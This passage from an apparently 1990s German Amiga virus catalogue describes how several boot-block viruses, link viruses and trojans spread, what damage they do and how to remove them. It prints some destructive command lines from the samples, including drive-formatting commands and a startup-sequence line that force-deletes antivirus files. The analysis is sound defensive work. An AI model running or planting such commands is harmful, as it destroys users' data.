  1225.  -.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
  1226.  
  1227.  Signed:                                                PORT/\X of W|BBlE
  1228.  =======                                                =================
  1229.  
  1230.  Call Fraxion Pleasure at ++31/45/678452 (16.8k Dual!)
  1231.  
  1232.       Im File ist zu lesen:
  1233.            316d7c7c 2020204d 554c5449 4e4f4445 1m||   MULTINODE
  1234.            20434841 5420444f 4f522056 45525349  CHAT DOOR VERSI
  1235.            4f4e2056 322e3320 1b5b3337 6d5b4255 ON V2.3 .[37m[BU
  1236.            47464958 45445d1b 5b303b33 326d201b GFIXED].[0;32m .
  1237.            5b316d46 524f4d20 1b5b3335 6d504f52 [1mFROM .[35mPOR
  1238.            54415820 4f462057 4942424c 45202020 TAX OF WIBBLE
  1239.            20201b5b 33316d7c 7c001b5b 303b316d   .[31m||..[0;1m
  1240.            3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d3d ================
  1241.            3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d3d ================
  1242.            3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d3d ================
  1243.            3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d3d ================
  1244.            3d3d3d3d 3d3d3d3d 3d3d3d3d 3d000000 =============...
  1245.            00001b5b 306d2020 57616974 696e6721 ...[0m  Waiting!
  1246.            21210000 72616d3a 63720000 7700636f !!..ram:cr..w.co
  1247.            70792063 3a666f72 6d617420 72616d3a py c:format ram:
  1248.            66660000 636f7079 20737973 3a737973 ff..copy sys:sys
  1249.            74656d2f 666f726d 61742072 616d3a66 tem/format ram:f
  1250.            66007261 6d3a6666 20647269 76652064 f.ram:ff drive d
  1251.            68303a20 6e616d65 20484148 41484120 h0: name HAHAHA
  1252.            6e6f6963 6f6e7320 71756963 6b203c20 noicons quick <
  1253.            72616d3a 63720000 72616d3a 66662064 ram:cr..ram:ff d
  1254.            72697665 20737973 74656d32 2e303a20 rive system2.0:
  1255.            6e616d65 20484148 41484120 6e6f6963 name HAHAHA noic
  1256.            6f6e7320 71756963 6b203c20 72616d3a ons quick < ram:
  1257.       Schadensverlauf:
  1258.         Nach Programmaufruf wird der format-Befehl mit neuem
  1259.         Namen "ff" nach ram: kopiert. Danach beginnt die Suche
  1260.         nach Partitions-Namen und LWen:
  1261.           dh0:, system2.0:, work:, dh1:, bbs:, df0:, df1:,
  1262.           dh2:, dh3:, dh4:, df2:, HD:, df0:
  1263.         Gefundene LWe werden schnell formatiert mit z.B.:
  1264.           ram:ff drive dh0: name HAHAHA noicons quick
  1265.         D.h. wahrscheinlich koennen Sie mit Disksalv2 ihre Partition
  1266.         retten, da mit dem Parameter quick nur der BB, Root und
  1267.         Bitmap neu geschrieben werden.
  1268.         Am Schluss soll ausgegeben werden:
  1269.                  " Sorry ",0
  1270.                  ", the BBS is not registred",0
  1271.         VT2.57: (26.09.93)
  1272.         Nur loeschen moeglich, da das Teil in das Chat-Prg. eingebaut
  1273.         ist und deshalb nicht durch Ausbau eines Hunks entfernt wer-
  1274.         den kann.
  1275.      Nachtrag 03.94:
  1276.         Von MultiChat ist ein Namensaenderung aufgetaucht.
  1277.         Name: ATX-Chat
  1278.         Laenge: 13492 Bytes
  1279.         Nicht einmal die Texte im File wurden geaendert.
  1280.         Wird von VT erkannt und sollte geloescht werden.
  1281.         Rest siehe oben
  1282.         Doc-File-Auszug:
  1283.             MULTINODE CHAT DOOR VERSION V3.0 FROM TRASH/ANTHROX
  1284.  
  1285.    WELL THIS IS THE NEW 32 MULTICHAT DOOR FROM TRASH/ANTHROX.YOU NEED /X
  1286.                               3.32 OR HIGER.
  1287.         ;....
  1288.  
  1289.    - MAAS-BB-Virus    Warhawk-Clone
  1290.       nur Textaenderung, eine echte Meisterleistung
  1291.       siehe bei Warhawk
  1292.       im BB ist zu lesen:
  1293.                         4d41 41532d45 58544552       MAAS-EXTER
  1294.            4d494e41 544f523a 20544849 53204953 MINATOR: THIS IS
  1295.  
  1296.    - MACK-Trojan  siehe unten bei WAWE-Trojan
  1297.  
  1298.    - MAD  (ForpibClone)  nur Text geaendert  s.o.
  1299.  
  1300.    - MAD II     nur KS1.2, da absoluter DoIo-ROM-Einsprung
  1301.       Cool, DoIo, KickTag, KickCheckSum, im Speicher immer $7FB00
  1302.       im BB sichtbar: MAD II VIRUS is better  usw.
  1303.       Fordert trackdisk.device NICHT
  1304.       Vermehrung: ueber BB
  1305.       Sobald der Inhalt des Zaehlers groesser $D ist, wird in eine
  1306.       DiskStepRoutine verzweigt. Da diese falsch programmiert und somit
  1307.       nicht funktionsfaehig ist, wird nur der Bildschirm dunkel.
  1308.       Hinweis: es existiert ein MAD II, bei dem der MAD-Text mit sinn-
  1309.       losen Buchstabenfolgen (z.B. DAFGderFEHY) ueberschrieben wurde.
  1310.       Wird von VT als MAD II erkannt.
  1311.       Clone: KHOMEINI-Virus s.o.
  1312.  
  1313.    - MAD IIa  wie MAD II nur jetzt Warm fuer Cool und andere Source-
  1314.       Aenderungen z.B. $2a in $2e usw. Ergebnis bleibt gleich
  1315.          (Anfaenger bitte bleibt beim Joystick !!!)
  1316.  
  1317.    - MAD2-TAI2-Virus  BB   Clone  s.o.
  1318.       Text geaendert (rueckwaerts) eine Meisterleistung
  1319.            6c696272 61727900 73696874 20736920 library.siht si
  1320.            65687420 646e6f63 65732073 75726976 eht dnoces suriv
  1321.            20666f20 65687420 72656d61 6c69746e  fo eht remalitn
  1322.            41206e6f 69746172 6f70726f 4320492e A noitaroproC I.
  1323.            412e542e 20202068 74616564 206f7420 A.T.   htaed ot
  1324.            6c6c6120 7372656d 616c2c20 69697269 lla sremal, iiri
  1325.            7620646e 61206969 72697620 7265766f v dna iiriv revo
  1326.            20756f79 20402054 2e412e49 2e204261  uoy @ T.A.I. Ba
  1327.            64206469 736b7320 3a292929 29292929 d disks :)))))))
  1328.  
  1329.  
  1330.    - MAD III  nur KS1.2  Byte-Warrior-Clone  s.o.
  1331.          geaendert:  DASA0.2 in MAD.III
  1332.            4d414400 4949493c 000813fc 000200bf MAD.III<........
  1333.  
  1334.    - MAD IIIB  nur KS1.2  Byte-Warrior-Clone  s.o.
  1335.          geaendert:  DASA0.2 in MAD III
  1336.            4d414420 4949493c 000813fc 000200bf MAD III<........
  1337.          Der Unterschied ist 00 zu 20 .
  1338.          Desweiteren scheint unklar gewesen zu sein, dass es sich
  1339.          bei DASA0.2 nicht um einen Text, sondern um eine Befehlsfolge
  1340.          handelt.
  1341.  
  1342.    - MAD IV  LamerAltClone  s.o.
  1343.          Unterschied: statt mit Lamer! soll der zerstoerte Block mit MAD
  1344.                       gefuellt werden.
  1345.  
  1346.    - MAFIA-Virus  BB   Dotty-Clone  s.o.
  1347.  
  1348.    - MagiCall  es ist KEIN Virus  wird deshalb von VT nicht erkannt
  1349.       Es ist ein MagiCall (Laenge: 149664) aufgetaucht,
  1350.       an das am Anfang ein einfacher Hunk (mit Namen) angehaengt wur-
  1351.       de. Wenn Sie MagiCall aus dem Cli starten, passiert nichts.
  1352.       Starten Sie dagegen mit dem Icon, so beschwert sich MagiCall mit
  1353.       DisplayAlert ueber die falsche Hunkanzahl. Das Programm selbst
  1354.       enthaelt nach meiner Meinung keinen Virus.
  1355.  
  1356.  
  1357.    - MagicWB-Gag   File
  1358.       KEIN Virus
  1359.       KEINE verbogenen Vektoren
  1360.       KEINE Vermehrung
  1361.       Empfehlung: Loeschen
  1362.       Filename: in s: mti.data  Laenge: 88585 Bytes
  1363.       Es handelt sich um einen UNDOKUMENTIERTEN Gag, der NICHT bei jedem
  1364.       Bootvorgang aktiviert wird.
  1365.       Selbst in verschiedenen Netzen wurde ein Virus vermutet !!!
  1366.       ----- Ausriss -------
  1367.       Ich hab da ein kleine Virenprob, glaub ich !!
  1368.       In unregelmaeszigen Abstaenden erscheint beim Hochfahren des Rechners
  1369.       eine Grafik und Sound, danach Absturz des Rechners, beim erneuten
  1370.       Hochfahren wieder alles roger.
  1371.       Vielleicht kennt einer das Teil:
  1372.           Merkmale: Grafik ein Dreieck und Dolby Surround (THX) mit
  1373.           ^^^^^^^^  Soundunterstuetzung.
  1374.       Kein Virenscanner konnte einen Virus entdecken !! In welchem
  1375.       Programm steckt der drin ??
  1376.       Ich bin dankbar fuer jeden Hinweis, denn das nervt auf die Dauer !!
  1377.       ----- Ausriss-Ende ------
  1378.       Die verschiedenen Anfrager konnten beruhigt werden.
  1379.       ABER !!!!
  1380.       Haben die Programmierer darueber nachgedacht, welchen Schreck ein
  1381.       Anfaenger bekommt. Die Anfaenger haben wahrscheinlich KEIN Modem.
  1382.       Wer hilft diesen Personen ?????
  1383.  
  1384.    - MakroTroj-BEOL5      Text und Icon
  1385.          Namensbegruendung: Im Ram wird ein File BEOL5 angelegt
  1386.          Verbogene Vektoren: nein
  1387.          Resetfest: Nein
  1388.        Ablauf:
  1389.          Ueber das Icon wird Multiview aufgerufen. Es wird ein Text
  1390.          angezeigt, der 3 Gadgets enthaelt. Diese Gadgets erhalte ich
  1391.          nur, wenn ich Multiview von WB3.1 verwende. Arbeite ich mit
  1392.          Multiview von WB3.0, dann werden bei mir die Gadgets nicht an-
  1393.          gezeigt. Klicken Sie auf eines dieser Gadgets, so wird die
  1394.          startup-sequence (im Ram:BEOL5) geaendert.
  1395.          startup vorher:
  1396.           ; $VER: Startup-Sequence_HD 40.4 (31.8.93)
  1397.                ;.....
  1398.          startup nachher:
  1399.           delete >NIL: (#?virus#?|#?vt#?) ALL FORCE QUIET
  1400.           echo I am a perverse teeny-fucker, I am not worth living!
  1401.           ; $VER: Startup-Sequence_HD 40.4 (31.8.93)
  1402.                ;.....
  1403.          Beim naechsten Reset werden alle Programme UND Dirs geloescht,
  1404.          die die Zeichenabfolge (s.o.) enthalten. Danach wird ein Text
  1405.          im Cli ausgegeben.
  1406.          VT sollte das Ausloesefile und die Veraenderung in der startup-
  1407.          sequence erkennen und Loeschen oder Ausbau anbieten. Sie koennen
  1408.          die Zeilen in der Startup-sequence natuerlich auch mit einem
  1409.          Editor ihrer Wahl ausschneiden.
  1410.  
  1411.  
  1412.    - MALLANDER VIRUS V1.0  BB  Block 0-3  auch KS2.04, braucht 1Mb Chip
  1413.          entgegen anderen Behauptungen: laeuft AUCH mit KS1.3 !!!
  1414.          KickTag, KickCheckSum, DoIo, immer ab 7F800
  1415.          anderer Name: DERK    ist 2x im BB zu lesen
  1416.          fordert trackdisk.device NICHT
  1417.          holt 4 Bloecke:
  1418.          Block 0 u. 1 = Virus
  1419.          Block 2 u. 3 = OrigBB  nicht codiert
  1420.          Vermehrung und Schaeden:
  1421.          speichert 4 Blocke ab, d.h. ein File das Block 2 u. 3 belegt,
  1422.          wird zerstoert.
  1423.          belegt immer $4000 ChipSpeicher neu
  1424.          sobald kein Chip mehr frei:
  1425.          decodiert einen BB-Teil mit  eori.w #$aaaa,(a0)+
  1426.          (auch intuition.library) und gibt den Text mit DisplayAlert aus.
  1427.          Danach Reset = jmp FC0000
  1428.                          J.D. MALLANDER VIRUS V. 1.0
  1429.          I need lots of money - buy my cool pd serie 'action power'
  1430.          Hinweis: es gibt KEINE 2 DERK, sondern einer enthaelt Vektoren
  1431.          von KS1.3, der andere von KS2.04 (Beweis: VT vergl.).
  1432.  
  1433.    - MASTER-BBS-Trojan  Name uebernommen nicht nachvollziehbar im Speicher
  1434.          Laenge gepackt:  1652 Bytes
  1435.          Laenge entpackt: 2300 Bytes
  1436.          Keine verbogenen Vektoren
  1437.          Keine Vermehrungsroutine
  1438.          Im entpackten File ist zu lesen:
  1439.            646f732e 6c696272 61727900 4e494c3a dos.library.NIL:
  1440.            00424253 3a555345 522e4b45 59530042 .BBS:USER.KEYS.B
  1441.            42533a55 5345522e 4b455953 004e494c BS:USER.KEYS.NIL
  1442.            3a004242 533a5553 45522e44 41544100 :.BBS:USER.DATA.
  1443.            4242533a 55534552 2e444154 4100536e BBS:USER.DATA.Sn
  1444.            6f6f7044 6f730041 43500061 63700000 oopDos.ACP.acp..
  1445.            4d414749 43202020 00000000 00000000 MAGIC   ........
  1446.          Gefahr nur fuer Mailbox-Betreiber.
  1447.          Empfehlung loeschen.
  1448.          Soll CONMAN usw. nach $7C000 schreiben.
  1449.          Sucht nach SnoopDos
  1450.          Sucht nach ACP-task (acp auch) Nein dann Ende
  1451.          Schreibt in USER.DATA und USER.KEYS Teile des eigenen Files
  1452.          mit MAGIC usw. . Wahrscheinlich eine Zugangsberechtigung.
  1453.      Clone 07.01.94: Filename Master-Who  Laenge: 4844 Bytes
  1454.          mitgelieferter Doc-Auszug:
  1455.                         *****************************
  1456.                         *                           *
  1457.                         *      MASTER-WHO V1.1      *
  1458.                         *                           *
  1459.                         *****************************
  1460.   Featuring
  1461.   ---------
  1462.   -Automatically determines how many nodes are running (up to 9 nodes).
  1463.   -Shows Node number , Name , Location and Action.
  1464.   -The fastest who door available (100% 68000 Assembler).
  1465.   -The shortest who door available.
  1466.   -Tracks even loss of carriers.
  1467.   -Show full action in your Kickstart workbench 1.3 2.0
  1468.   -Show download files
  1469.        usw.
  1470.          In Wirklichkeit ist es ein Master-BBS-Trojan. Wurde mit
  1471.          4eb9-4ef9-Link an ein NUTZLOSES Programm angebracht. Von der
  1472.          Nutzlosigkeit koennen Sie sich selbst ueberzeugen, wenn Sie
  1473.          im Filerequester den 1.Hunk abschalten.
  1474.          VT bietet deshalb nur loeschen an.
  1475.  
  1476.    - MAX  BB       SCA-Clone  s.u.
  1477.  
  1478.    - Maxsafe  Trojan
  1479.          Verbogene Vektoren: keine
  1480.          Nicht Resetfest
  1481.          Archivname: MAXSAFE.LHA  13065 Bytes
  1482.          Filename: maxsafe         5008 Bytes
  1483.          nach readme:   
  1484.         Max door control is a program I wrote about a year ago to help
  1485.         me  sort out bugs in max, It uses the maxpacker.library and monitors
  1486.         all functions called by max, It creates an out put text file
  1487.         showing you any possible problems with any function 34 door.
  1488.          Notwendige libs: hbasic2.lib, hisoftbasic.lib und maxpacker.lib
  1489.          (die wird mitgeliefert und ist in Wirklichkeit eine pp.lib)
  1490.          Ohne diese Libs Abbruch ohne Schadensfunktion.
  1491.          Ablauf:
  1492.          In Ram: werden vier Files erzeugt:
  1493.            runit            9012 Bytes
  1494.            runit.info        338 Bytes
  1495.            YES                 1 Byte
  1496.            YES.info          338 Bytes
  1497.           Hinweis: runit ist in Wirklichkeit ein Nutzprg. (ReadRDB v05.)
  1498.                    und wird hier nur fuer eine Zerstoerungsfunktion miss-
  1499.                    braucht.
  1500.          Weiterhin wird s/startup-sequence geoeffnet.
  1501.          Nach einigen Sekunden wird OHNE Reset ausgefuehrt:
  1502.            execute ram:runit < ram:yes d scsi.device
  1503.          Dies ist die eigentliche Schadensfunktion.
  1504.          Der Inhalt der startup-sequence wird ab Block 0 in den Rigid-
  1505.          Bereich der Unit 0 geschrieben. Der Rest des Rigidbereichs
  1506.          wurde bei mir mit Nullen aufgefuellt.
  1507.          Es sind nur UNIT 0 (1 keine Veraenderung) und nur Festplatten,
  1508.          die mit scsi.device angesprochen werden, betroffen (also z.B.
  1509.          keine Zerstoerung bei gvpscsi.device).
  1510.          vorher:
  1511.          pZyl 0 Bl      0  RDSK-Bl ChS: ok
  1512.          00: 5244534b 00000040 334d4846 00000007 RDSK...@3MHF....
  1513.          10: 00000200 00000012 ffffffff 00000001 ................
  1514.          nachher:
  1515.          pZyl 0 Bl      0
  1516.          00: 0a3b2053 74617274 75702d53 65717565 .; Startup-Seque
  1517.          10: 6e636520 666f7220 68617264 20647269 nce for hard dri
  1518.          Hinweis: Vielleicht sollten Sie doch einmal darueber nachdenken,
  1519.          den Rigid-Bereich Ihrer Festplatte mit VT/zeigeZyl/backup oder
  1520.          einem anderen Tool auf eine DISK (nur da ist es sinnvoll) zu
  1521.          sichern. Kopieren sie dann bitte auch den mount-Befehl und ein
  1522.          mountfile auf diese Disk.
  1523.  
  1524.    - MaxStarL.-Virus   Bootblock
  1525.        Verbogene Vektoren: KickTag, DoIo, GetMes, DisplayAlert
  1526.        KS 40.063: Ja
  1527.        Fordert trackdisk.device NICHT
  1528.        Schreibt immer DOS0-BB
  1529.        Versucht einen sauberen BB vorzuzeigen.
  1530.        Grosser Teil des BB.s codiert. Das Codierbyte aendert sich mit
  1531.        jedem Schreiben.
  1532.        Decodiert mit eor.b d0,(a0)+ ist im Speicher zu lesen:
  1533.           08085468 65204d61 78206f66 20537461 ..The Max of Sta
  1534.           724c6967 68742056 69727573 60393300 rLight Virus`93.
  1535.        Vermehrung: BB
  1536.        Schaeden:
  1537.          Ermittelt mit $DFF006 eine Blocknumer. Testet ob dieser Block
  1538.          mit #8 beginnt (also OFS), und schreibt diesen Block dann mit
  1539.          INSANE!! voll. Da ist dann leider NICHTS mehr zu retten.
  1540.          Block:     973
  1541.           0000: 494e5341 4e452121 494e5341 4e452121 INSANE!!INSANE!!
  1542.           0010: 494e5341 4e452121 494e5341 4e452121 INSANE!!INSANE!!
  1543.            usw....
  1544.          Bei Tests mit DF1: wurde mehrmals (nachvollziehbar KS2.04)
  1545.          nicht ein Block gefuellt, sondern ein ganzer Track unlesbar.
  1546.  
  1547.  
  1548.  
  1549.    - MCA      siehe Claas Abraham
  1550.  
  1551.    - MegaLink    Link   verlaengert ein File um 1044 Bytes
  1552.          Es wird ein neuer erster Hunk erzeugt ($FD) .
  1553.          KEINE verbogenen Vektoren.
  1554.          KS1.3  ja
  1555.          KS2.04 ja
  1556.          Mehrfachlinks: nein, da "schon verseucht"-Test
  1557.          Defekte Files: ja   (Hunkstruktur defekt nur loeschen moeglich)
  1558.          Kennt nicht alle Hunktypen.
  1559.          Namensbegruendung:
  1560.           Decodiert mit eori.b #$f,(a1)+ ist im Speicher zu lesen:
  1561.            7379733a 00007379 733a6300 646f732e sys:..sys:c.dos.
  1562.            6c696272 61727900 4d656761 4c494e4b library.MegaLINK
  1563.          Vermehrung:
  1564.           Da keine Vektoren verbogen werden, muessen Sie ein verseuchtes
  1565.           Prg. starten und dieses Prg. versucht dann EINE Vermehrung.
  1566.           Beispiel: sie booten von der Festplatte und starten dann ein
  1567.           verseuchtes Prg. von DF0: . Das Linkteil wird dann versuchen,
  1568.           auf ihrer Festplatte (sys:) ein Prg. zu verseuchen. Wenn dies
  1569.           nun ein Befehl in sys:c ist, der beim Booten immer aufgerufen
  1570.           wird, so wird jedes Mal ein Vermehrungsversuch unternommen.
  1571.           Fuer die Vermehrung werden DosBefehle (info, examine, exnext
  1572.           usw.) verwendet. Ein Mehrfachlink duerfte nicht moeglich sein,
  1573.           da auf ein Langwort getestet wird. Die Nachbehandlungsroutine
  1574.           ist aufs Byte genau, mit ALLEN Fehlern von CCCP uebernommen.
  1575.           Deshalb koennen defekte Files entstehen.
  1576.          Vermehrungsbedingungen:
  1577.           File ausfuehrbar ($3f3)
  1578.           Filelaenge max. #15000 ($3a98)
  1579.           Disk validated  ($52)
  1580.           Auf der Disk sind noch mind. 8 Bloecke frei.
  1581.        Fileerkennung mit VT getestet : 16.11.93
  1582.        Ausbau mit VT getestet :        16.11.93
  1583.  
  1584.    - MEGAMASTER
  1585.       Cool, DoIo, immer $7e300
  1586.       zwei codierte Bereiche im BB
  1587.       1. Bereich: eori.b #-$45,(a0)+   ; testet auf andere Viren
  1588.       2. Bereich: eori.b #-$11,(a0)+   ; Textausgabe ueber Graphik
  1589.                schwarzer Hintergrund, rote Schrift
  1590.                         Surprise!!!
  1591.                Your Amiga is controlled by
  1592.                         MEGAMASTER
  1593.      Vermehrung: ueber BB
  1594.  
  1595.    - MegaMon   siehe bei PP-Bomb
  1596.  
  1597.    - MeGaSUXX.TXT   siehe bei Elien-Trojan
  1598.  
  1599.    - members.exe   siehe bei IconD-Trojan
  1600.  
  1601.    - MemCheck v8.1  File anderer Name: Liberator virus v1.21
  1602.          gepackt (PP): 6492 Bytes   ungepackt: 10936 Bytes
  1603.          nicht resident
  1604.          nach Aufruf erfolgt Textausgabe: MEMORY CLEAR usw.
  1605.          mit SnoopDos kann man feststellen, dass :
  1606.             - versucht wird Sys:.FastDir zu oeffnen
  1607.             - Test ob MemCheck schon in Root
  1608.             - versucht wird startup-sequence zu oeffnen
  1609.                falls ja Eintrag in erste Zeile:
  1610.                   MemCheck s
  1611.          Weiterhin ist im File zu lesen:
  1612.             Hello from the Liberator virus v1.21
  1613.             Lets play trash the harddisk
  1614.             I`m outta here, kiss mine you lamer!
  1615.  
  1616.             DH0: , BLVC   usw.
  1617.  
  1618.          Mit Festplatte:
  1619.          Es wird ein File .FastDir im Root-Verz. angelegt. Sobald im
  1620.          File der Wert $f erreicht ist, erfolgt die Textausgabe (s.o.)
  1621.          und der Computer stellt die Arbeit ein. Kreset wird not-
  1622.          wendig.
  1623.  
  1624.    - MemSearcher-Virus  BB    $6c, $80,  immer ab $7EC00
  1625.          Eine Speicherlupe bis $80000 im BB
  1626.          Da keine Vermehrung eigentlich von der Definition her kein
  1627.          Virus. Aber auf Grund der verbogenen Vektoren dringende Loesch-
  1628.          empfehlung.
  1629.  
  1630.    - MENEM'S REVENGE   Link  LoadSeg
  1631.       Haengt 2 Hunks (ist neu) an. Hunk 1 = $3E9 = CodeHunk
  1632.                                    Hunk 2 = $3EA = DataHunk
  1633.       Typ A:
  1634.       Verlaengert ein befallenes File um #3076 Bytes.
  1635.       Typ B: (PIF-Virus)
  1636.       Verlaengert ein befallenes File um #3124 Bytes.
  1637.       Auch mit KS2.04
  1638.       Korrigiert dos.library mit SumLib.
  1639.       Ueberlaeuft $3E8-, $3F0- und $3F1-Hunks.
  1640.       Erzeugt einen Prozess mit Namen: " ",0 . Nach meiner Meinung
  1641.       ist der Kopf des 1. Segments von " " FALSCH.
  1642.       Wird ein schon befallenes File danach befallenen, so wird mit
  1643.       FindTask ueberprueft, ob der Prozessname schon da ist.
  1644.       Linkbedingungen:
  1645.       File kleiner als #60000
  1646.       Erster CodeHunk enthaelt folgende Bytefolge NICHT:
  1647.          $286A0164 $700C4E095   (vgl. WB1.3 in c  ask  usw.)
  1648.       Linkablauf:
  1649.       Sie starten ein Programm. Menem "merkt" sich dieses Prg..
  1650.       Sie starten ein neues Prg.. Jetzt erst linkt sich Menem an das
  1651.       alte Prg. Nachweis fuer Nicht-Ass-Benutzer mit SnoopDos.
  1652.       Linkergebnisse mit KS1.3:
  1653.       - gelinktes File ausfuehrbar      (auch libs usw.)
  1654.       - gelinktes File NICHT ausfuehrbar   (Hunks des OrigFiles nicht
  1655.           richtig behandelt, File bringt GURU)
  1656.       - File enthaelt nur noch Datenmuell  (keine Rettung moeglich)
  1657.       Unter KS2.04 entstehen weniger defekte Files. 
  1658.       Mit timer.device werden sechs Systemzeiten abgefragt.
  1659.       Textausgabe dann mit DisplayAlert.
  1660.       Dafuer wird ein Virusprogrammteil mit  asr.l #1,d0  decodiert.
  1661.             dc.b 0,$50,$10,"MENEM'S REVENGE HAS ARRIVED !!!"
  1662.                 dc.b 0,1,0,"  ARGENTINA STILL ALIVE",0,0
  1663.       Hinweis: VT setzt LoadSeg zurueck, schreibt einige RTS in den
  1664.          Speicher, entfernt den Prozess " " auf Wunsch. Sie MUESSEN
  1665.          allerdings mit einem GURU rechnen !!!!
  1666.       Hinweis2: Bei den Datenmuellfiles kann VT NICHT mehr helfen. Fuer
  1667.          Ausbauversuche bei den anderen Filetypen verwenden Sie bitte
  1668.          eine Kopie der verseuchten Disk. VT versucht auch, die
  1669.          "falschen Hunks" wieder zu berichtigen.
  1670.       Hinweis3: Bedenken Sie bitte, dass inzwischen einige Programme
  1671.          auf dem Markt sind, die Loadseg verbiegen. Wurde Menems VORHER
  1672.          gestartet, so wird er "zugedeckt", bleibt ABER AKTIV !!!!!!
  1673.          Koennen Sie z.B. mit Snoopdos nachvollziehen.
  1674.          Meine Empfehlung: keine Programme verwenden, die LoadSeg patchen.
  1675.  
  1676.    - merry BBS-Trojan          File   Laenge ungepackt: 60356 Bytes
  1677.          Zerstoerungsprg. gegen BBS gerichtet.
  1678.          Keine verbogenen Vektoren
  1679.          3-fach $4EB9-$4EF9-Link
  1680.          KS2.04 bei mir kein Intro
  1681.          68000  bei mir kein Intro
  1682.          68030+KS1.3  Kefrens-Intro und versuchter BBS-Zugriff. Braucht
  1683.          powerpacker.lib und explode.lib .
  1684.          VT bietet nur loeschen an.
  1685.  
  1686.    - MessAngel-Inst.   File
  1687.          Keine verbogenen Vektoren, da nur RESET zugelassen wird.
  1688.          Verwendet Befehle von KS2.04, z.B. ColdReset
  1689.          Anderer Name: ELENI!-Inst.
  1690.          Laenge gepackt:   1808 Bytes
  1691.          Laenge ungepackt: 7100 Bytes
  1692.          Im entpackten File ist zu lesen:
  1693.             61727900 00000000 7379733a 42007379 ary.....sys:B.sy
  1694.             733a732f 73746172 7475702d 73657175 s:s/startup-sequ
  1695.             656e6365 009b333b 33326d4d 65737341 ence..3;32mMessA
  1696.             6e67656c 206b696c 6c657220 62792044 ngel killer by D
  1697.             6f636b65 72206f66 20547769 7374210a ocker of Twist!.
  1698.             9b303b33 316d9b34 43436865 636b696e .0;31m.4CCheckin
  1699.             67207374 61727475 702d7365 7175656e g startup-sequen
  1700.             63652e2e 2e0a0a9b 35435649 52555320 ce......5CVIRUS
  1701.             464f554e 4420414e 44205245 4d4f5645 FOUND AND REMOVE
  1702.             44212121 0a0a9b34 43526967 68742074 D!!!...4CRight t
  1703.             6f206469 7361626c 65206672 6f6d206d o disable from m
  1704.             656d6f72 79210a9b 34432d2d 2d2d2d2d emory!..4C------
  1705.          Das Teil behauptet also im Cli, ein MessAngel-Viruskiller zu
  1706.          sein. In Wirklichkeit wird im Rootverzeichnis ein File mit
  1707.          dem Namen B abgespeichert.
  1708.          In der startup-sequence wird am Anfang "B",0a eingetragen.
  1709.          Abgespeichert werden IMMER #5000 Bytes. War Ihre startup-
  1710.          sequence laenger, so verlieren Sie Zeilen. War Ihre start-
  1711.          up-sequence kuerzer, so wird der Rest mit 0 aufgefuellt.
  1712.          Beim Loeschen der 1.Zeile in der startup-sequence kann es
  1713.          dann vorkommen, dass Ihr editor meldet "file contains bin-
  1714.          ary" und die Arbeit verweigert. Sie muessen dann auf einen
  1715.          anderen Editor ausweichen.
  1716.          Das Programm koennen Sie nur mit der r.MT = Reset verlassen.
  1717.  
  1718.    - MessAngel-B-Virus   File
  1719.          Laenge: 1504 Bytes  (immer ungepackt)
  1720.          Anderer Name: ELENI!-B-Virus
  1721.          Filename im Rootverzeichnis: B
  1722.          Wenn Cool-Vektor noch nicht verbogen, dann veraendere Cool-
  1723.          Vektor und dann ColdReset (KS2.04). Durch das Booten wird
  1724.          der MessAngel.BB-Virus geschrieben (s.u.)
  1725.          Das Teil wird immer aufgerufen, da es ja in der startup-
  1726.          sequence liegt.
  1727.          Falls Cool schon verbogen, dann verbogene Vektoren:
  1728.          Cool, DoIo, LoadSeg
  1729.          Das File besteht nur aus einem BB-Code, in dem mit $6000000E
  1730.          eingesprungen wird.
  1731.  
  1732.    - MessAngel.BB-Virus
  1733.          Verbogenen Vektoren: Cool, DoIo, LoadSeg
  1734.          Anderer Name: ELENI!.BB
  1735.          Im BB ist uncodiert zu lesen:
  1736.             284118fc 004518fc 004c18fc 004518fc (A...E...L...E..
  1737.             004e18fc 004918fc 00216000 007a48e7 .N...I...!`..zH.
  1738.          Das Virusteil arbeitet teilweise mit absoluten Adressen
  1739.          ($F0, $124-$130 usw.).
  1740.          Ablauf:
  1741.          Ein Programm ruft DoIo auf:
  1742.          Zuerst wird nach -$1400(a6) das LW $4EEEFDD8 geschrieben.
  1743.          Ob da schon was wichtiges liegt, ist anscheinend unwichtig.
  1744.          Es war DoIo-Read:
  1745.          BB-Virus wird geschrieben (falls kein Schreibschutz)
  1746.          Es war DoIo-Write:
  1747.          Test ob LoadSeg schon verbogen.
  1748.          Falls ja, fuehre Orig.DoIo-Write aus.
  1749.          Falls nein, verbiege LoadSeg und dann Orig.DoIo-Write.
  1750.          Ein Programm ruft LoadSeg auf:
  1751.          - Test ob $DC002D schon 1: (nur bei einigen Amigas Uhr)
  1752.            Falls ja, wird LoadSeg der Name ELENI! uebergeben. Es fehlt
  1753.            zwar $0 am Schluss, aber was solls.
  1754.            Falls nein,
  1755.            Test auf Schreibschutz ($99)
  1756.            Rette Filename Laenge max 25+1 . Und wenn der Filename (+Pfad)
  1757.            laenger ist ???
  1758.            Test auf Filelaenge max #100000 .
  1759.            Rette Filelaenge nach $F0  !!!!!!
  1760.            Suche im File bis zu einer bestimmten Tiefe nach LW $4EAEFDD8
  1761.            (waere bei exec OpenLib, bei einer anderen Lib etwas anderes.
  1762.            Koennte aber zufaellig auch in einem gecrunchten File vorkom-
  1763.            men). Ersetze dieses LW durch $4EAEEC00.
  1764.                 4EEEFDD8   JMP -$0228(A6)
  1765.                 4EAEFDD8   JSR -$0228(A6)
  1766.                 4EAEEC00   JSR -$1400(A6)
  1767.            Schreibe File zurueck und dann Orig.LoadSeg .
  1768.            Das bearbeitete File koennte also laufen, solange das Virusteil
  1769.            im Speicher ist. Ohne Virusteil im Speicher sehen Sie sicher
  1770.            den GURU.
  1771.          VT findet solche veraenderte Files NICHT !!!
  1772.          Falls Sie also auf eine Disk mit MessAngel-Virus treffen und
  1773.          einige Files laufen nicht, dann nehmen Sie einen Filemonitor.
  1774.          Geben Sie als Suchstring $4EAEEC00 ein und ersetzen Sie das LW
  1775.          bei Bedarf durch $4EAEFDD8. Hinweis: Die Veraenderung kann in
  1776.          einem File MEHRFACH vorkommen.
  1777.  
  1778.  
  1779.     - METAMORPHOSIS V1.0   BB und Link     auch KS2.04  immer ab $7FA72
  1780.          Fordert trackdisk.device NICHT !!!
